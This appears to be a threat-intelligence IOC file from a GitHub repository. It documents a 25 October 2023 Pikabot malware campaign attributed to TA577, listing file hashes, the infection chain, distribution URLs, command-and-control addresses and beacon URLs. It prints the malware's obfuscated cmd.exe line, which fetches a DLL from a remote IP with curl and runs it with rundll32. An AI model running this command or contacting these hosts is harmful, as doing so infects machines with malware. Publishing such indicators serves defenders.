-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathPikabot_25.10.2023.txt
60 lines (37 loc) · 2.29 KB
/
Pikabot_25.10.2023.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
25.10.2023 | Pikabot | TA577 | 1.1.15-ghost
*************************************************
.url https://obikua.com/tr/?1
.zip bb814925998eddbbb788971d1ca0072949493d433299ba65e2c8511d283106aa
.dll dbdd22025131eebe52efc5fbe70e2e87723ff1934c808901bbb176f6130f23f6
*************************************************
url > zip > js > curl > dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\Main420.js
cmd.exe /c jQ || echO jQ & PINg jQ || CURl http://49.13.119.72/jHuAT/Regul -o %tMp%\jQ.dlld & PINg -n 2 jQ || RUndlL32 %tMp%\jQ.dlld, Crash & EXiT LELtUTtZCSu
PINg jQ
CURl http://49.13.119.72/jHuAT/Regul -o C:\Users\Admin\AppData\Local\Temp\jQ.dlld
PINg -n 2 jQ
RUndlL32 C:\Users\Admin\AppData\Local\Temp\jQ.dlld, Crash
*************************************************
distro url
https://obikua.com/tr/?1
*************************************************
.dll distro
http://45.63.90.172/51kp/count
http://208.83.233.168/hjZ21/Ontogw
*************************************************
c2's
139.177.198.199:2226
103.231.93.15:5631
154.92.19.139:2222
45.79.147.119:9785
172.234.29.13:2224
HTTPS Checking Traffic
https://154.92.19.139:2222/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://139.177.198.199:2226/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://103.231.93.15:5631/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://45.79.147.119:9785/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://172.234.29.13:2224/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://154.92.19.139:2222/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://139.177.198.199:2226/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://103.231.93.15:5631/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa
https://45.79.147.119:9785/unbeguileful/zgCPOPGs7HZF9o?unfallaciousness=Ix71N3yV&nonapplicableness=titillated&Fluidmeter=EavEa